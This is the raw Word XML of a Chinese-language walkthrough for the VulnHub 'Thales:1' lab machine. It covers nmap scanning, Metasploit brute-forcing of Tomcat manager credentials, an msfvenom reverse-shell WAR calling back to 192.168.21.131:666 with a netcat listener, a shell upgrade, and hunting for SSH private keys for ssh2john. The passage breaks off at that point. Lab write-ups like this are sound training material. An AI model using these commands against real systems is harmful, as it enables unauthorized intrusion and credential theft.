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AE6B" w14:textId="0DA2A991" w:rsidR="00D17CF6" w:rsidRDefault="00D17CF6">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hales:</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7675648D" w14:textId="00B5D492" w:rsidR="00D17CF6" w:rsidRDefault="00D17CF6">
      <w:r w:rsidRPr="00D17CF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶机地址：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>HYPERLINK "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D17CF6">
        <w:instrText>https://www.vulnhub.com/entry/thales-1,749/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="002B0AEF">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>https://www.vulnhub.com/entry/thales-1,749/</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6316DEE8" w14:textId="77777777" w:rsidR="00D17CF6" w:rsidRPr="00D17CF6" w:rsidRDefault="00D17CF6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F2996A0" w14:textId="62AAD9B0" w:rsidR="00D17CF6" w:rsidRDefault="00D17CF6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C7E839" w14:textId="630AB228" w:rsidR="00D17CF6" w:rsidRDefault="00D17CF6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D17CF6">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D17CF6">
        <w:t>-scan -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D3B57C" w14:textId="11340FC8" w:rsidR="00D17CF6" w:rsidRDefault="00D17CF6">
      <w:r w:rsidRPr="00D17CF6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="154E38FD" wp14:editId="41E82CD2">
            <wp:extent cx="5274310" cy="1351915"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="114156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64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5768" w14:textId="1B77AD9F" w:rsidR="00D17CF6" w:rsidRDefault="00D17CF6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624B735F" w14:textId="1E776783" w:rsidR="00D17CF6" w:rsidRDefault="00D17CF6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D17CF6">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D17CF6">
        <w:t xml:space="preserve"> --min-rate 10000 -p- 192.168.21.135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B54123" w14:textId="7A142E3B" w:rsidR="00D17CF6" w:rsidRDefault="00D17CF6">
      <w:r w:rsidRPr="00D17CF6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="733E8684" wp14:editId="40BB642C">
            <wp:extent cx="5105842" cy="1981372"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1965190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0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465" w14:textId="702CA9A3" w:rsidR="00D17CF6" w:rsidRDefault="00D17CF6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D17CF6">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D17CF6">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D17CF6">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D17CF6">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D17CF6">
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D17CF6">
        <w:t xml:space="preserve"> -O -p22,8080 192.168.21.135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286B8809" w14:textId="018B380E" w:rsidR="00D17CF6" w:rsidRDefault="00D17CF6">
      <w:r w:rsidRPr="00D17CF6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54F2119B" wp14:editId="1BDA892E">
            <wp:extent cx="5274310" cy="2673985"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="195454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45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6AB0" w14:textId="17913614" w:rsidR="00D17CF6" w:rsidRDefault="006403F2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单的漏洞的扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4688DF68" w14:textId="30A36250" w:rsidR="006403F2" w:rsidRDefault="006403F2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006403F2">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006403F2">
        <w:t xml:space="preserve"> --script=vuln -p22,8080 192.168.21.135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBDC98D" w14:textId="4B3EB6D7" w:rsidR="006403F2" w:rsidRDefault="006403F2">
      <w:r w:rsidRPr="006403F2">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FF93723" wp14:editId="56C51C2B">
            <wp:extent cx="5037257" cy="2743438"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="548071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71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ECA" w14:textId="084150E5" w:rsidR="006403F2" w:rsidRDefault="006403F2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>答题思路就是从8</w:t>
      </w:r>
      <w:r>
        <w:t>080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口拿到账号密码，再从2</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口远程登入，提权就能结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A44691E" w14:textId="3A186F41" w:rsidR="006403F2" w:rsidRDefault="006403F2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当然先看看8</w:t>
      </w:r>
      <w:r>
        <w:t>080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FEFFE6" w14:textId="1B8F03B8" w:rsidR="006403F2" w:rsidRDefault="006403F2">
      <w:r w:rsidRPr="006403F2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="588E6E2D" wp14:editId="0ABD8669">
            <wp:extent cx="5274310" cy="3101340"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="1656976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76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ADFE" w14:textId="5E8EA02E" w:rsidR="00295E3E" w:rsidRDefault="00295E3E">
      <w:r w:rsidRPr="00295E3E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20A3E0E0" wp14:editId="49F6B4E3">
            <wp:extent cx="4656223" cy="2994920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1993140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03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2A3" w14:textId="34432653" w:rsidR="00295E3E" w:rsidRDefault="00295E3E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解决登入问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E55E1C" w14:textId="45E984BE" w:rsidR="00295E3E" w:rsidRDefault="00295E3E">
      <w:r w:rsidRPr="00295E3E">
        <w:t>search tomcat login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E0FEA9" w14:textId="5EB848B0" w:rsidR="00295E3E" w:rsidRDefault="00295E3E">
      <w:r w:rsidRPr="00295E3E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EC97AE0" wp14:editId="79EE07C6">
            <wp:extent cx="5274310" cy="1571625"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="955549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9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B87E" w14:textId="07069AE3" w:rsidR="00295E3E" w:rsidRDefault="00295E3E">
      <w:r w:rsidRPr="00295E3E">
        <w:t>use auxiliary/scanner/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295E3E">
        <w:t>tomcat_mgr_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="360E9EE3" w14:textId="6EFD376F" w:rsidR="00295E3E" w:rsidRDefault="00E947EC">
      <w:r w:rsidRPr="00E947EC">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03449B22" wp14:editId="35C0F78D">
            <wp:extent cx="5274310" cy="6508115"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="265020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20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0BC" w14:textId="728C5B98" w:rsidR="00E947EC" w:rsidRDefault="00E947EC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置RHOSTS即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE92054" w14:textId="5C792DD7" w:rsidR="00E947EC" w:rsidRDefault="00E947EC">
      <w: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RHOSTS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 192.168.21.135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D21C4C" w14:textId="7E42DAB4" w:rsidR="00E947EC" w:rsidRDefault="00E947EC">
      <w:r w:rsidRPr="00E947EC">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65CD2107" wp14:editId="0978EA47">
            <wp:extent cx="4610500" cy="2911092"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1023099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99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7CC3" w14:textId="66BEF580" w:rsidR="00E947EC" w:rsidRDefault="00E947EC">
      <w:r w:rsidRPr="00E947EC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46DD15C7" wp14:editId="343696FB">
            <wp:extent cx="5274310" cy="1237615"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="140583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3F6B" w14:textId="2F51AEEF" w:rsidR="00E947EC" w:rsidRDefault="00E947EC" w:rsidP="00E947EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E947EC">
        <w:t>tomcat:role1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006E4ECB" w14:textId="5382FC27" w:rsidR="00E947EC" w:rsidRDefault="00E947EC" w:rsidP="00E947EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00E947EC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63104A12" wp14:editId="25F145BE">
            <wp:extent cx="5274310" cy="3077845"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="713204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4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7382" w14:textId="7CC24CFC" w:rsidR="00E947EC" w:rsidRDefault="00E947EC" w:rsidP="00E947EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台到手</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CA634C" w14:textId="256A9BD7" w:rsidR="00E947EC" w:rsidRDefault="00E947EC" w:rsidP="00E947EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来需要整一个木马了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A898D6A" w14:textId="05E95D6D" w:rsidR="00E947EC" w:rsidRDefault="00E947EC" w:rsidP="00E947EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="539C251E" w14:textId="04A34100" w:rsidR="00E947EC" w:rsidRDefault="00E947EC" w:rsidP="00E947EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00E947EC">
        <w:t>use payload/java/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E947EC">
        <w:t>jsp_shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7AE3B0B7" w14:textId="2979E18C" w:rsidR="00E947EC" w:rsidRDefault="00E947EC" w:rsidP="00E947EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="142403AA" w14:textId="0E2DCCAF" w:rsidR="00E947EC" w:rsidRDefault="00E947EC" w:rsidP="00E947EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>知道信息了制作木马</w:t>
      </w:r>
      <w:r w:rsidR="009B7E55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（别用数字）（后来换成了shell）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDC6475" w14:textId="5F6A768B" w:rsidR="009B09E4" w:rsidRDefault="00AA170F" w:rsidP="00E947EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA170F">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA170F">
        <w:t xml:space="preserve"> -p java/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA170F">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA170F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA170F">
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA170F">
        <w:t xml:space="preserve">=192.168.21.131 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA170F">
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA170F">
        <w:t xml:space="preserve">=666 -f war -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA170F">
        <w:t>shell.war</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004138ED" w:rsidRPr="004138ED">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004138ED" w:rsidRPr="004138ED">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0414205E" wp14:editId="1BFEB23B">
            <wp:extent cx="5274310" cy="695325"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="179720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0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058" w14:textId="05DAAC04" w:rsidR="009B09E4" w:rsidRDefault="009B09E4" w:rsidP="00E947EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传就可以，点击server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B416513" w14:textId="54A959E3" w:rsidR="009B09E4" w:rsidRDefault="009B09E4" w:rsidP="00E947EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="009B09E4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FEA3F97" wp14:editId="45835FAD">
            <wp:extent cx="5274310" cy="1901190"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="367829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9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32EF" w14:textId="718379AD" w:rsidR="009B09E4" w:rsidRDefault="009B09E4" w:rsidP="00E947EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>application能上传文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B123EC" w14:textId="06C7E13D" w:rsidR="009B09E4" w:rsidRDefault="009B09E4" w:rsidP="00E947EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="009B09E4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D189BC1" wp14:editId="08C328E8">
            <wp:extent cx="5274310" cy="573405"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2759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4BA" w14:textId="5F82D01B" w:rsidR="009B09E4" w:rsidRDefault="009B09E4" w:rsidP="00E947EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记得监听</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22353BFE" w14:textId="2F206B16" w:rsidR="009B7E55" w:rsidRDefault="009B7E55" w:rsidP="00E947EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004138ED">
        <w:t>666</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604DD64D" w14:textId="3334837B" w:rsidR="009B7E55" w:rsidRDefault="009B7E55" w:rsidP="00E947EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7E55">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00A4DEB4" wp14:editId="796C403F">
            <wp:extent cx="5274310" cy="311150"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="840461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618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53C" w14:textId="5F76A0AD" w:rsidR="009B09E4" w:rsidRDefault="009B7E55" w:rsidP="00E947EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问网页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB484BC" w14:textId="69F9A123" w:rsidR="009B7E55" w:rsidRDefault="009B7E55" w:rsidP="00E947EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="009B7E55">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28A79B7A" wp14:editId="12B3FFC8">
            <wp:extent cx="5274310" cy="1943735"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="128503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39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EAD4" w14:textId="7DBACD5F" w:rsidR="002C66D4" w:rsidRDefault="004138ED" w:rsidP="00E947EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="004138ED">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0265A888" wp14:editId="10FF15FE">
            <wp:extent cx="4793395" cy="1813717"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="583106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067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E420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是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python3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>，写入交互式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0D94AA" w14:textId="77777777" w:rsidR="004138ED" w:rsidRDefault="004138ED" w:rsidP="004138ED">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="20233E"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="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python3 -c 'import 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pty;pty.spawn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("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0D0D1A" w14:textId="5EBCBBD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38D0195C" wp14:editId="5DE2BEC0">
            <wp:extent cx="3793490" cy="598805"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="209978846" name="图片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AC5B" w14:textId="77777777" w:rsidR="004138ED" w:rsidRDefault="004138ED" w:rsidP="004138ED">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="20233E"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="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可以</w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:tgtFrame="_blank" w:tooltip="升级一下 shell" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
            <w:color w:val="47A1F6"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>升级一下</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
            <w:color w:val="47A1F6"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t xml:space="preserve"> shell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792D2075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查看一下权限：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53431D04" w14:textId="3F92E6BA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22699E6A" wp14:editId="113F2C4B">
            <wp:extent cx="4017010" cy="1932305"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1741995831" name="图片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DAD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不是之前发现的密码，那就看一下其他的信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC27CE9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在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/home </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>目录下发现了一些信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633EF965" w14:textId="1D8B5F0E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48EF00A1" wp14:editId="4B9490FF">
            <wp:extent cx="5274310" cy="3448050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="439319100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7030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发现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backup.sh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>文件可以运行系统指令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC68268" w14:textId="0A7ECFE0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13F7FC34" wp14:editId="66FCC783">
            <wp:extent cx="5274310" cy="4356735"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="582533409" name="图片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A69F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 xml:space="preserve">user.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>文件没有权限查看，除此之外还发现了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.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>文件夹：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0056269D" w14:textId="46A2E62B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2B9316F5" wp14:editId="3D5D7D76">
            <wp:extent cx="5274310" cy="5750560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="219196355" name="图片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40A77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发现有私钥，那就可以用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ssh2john.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
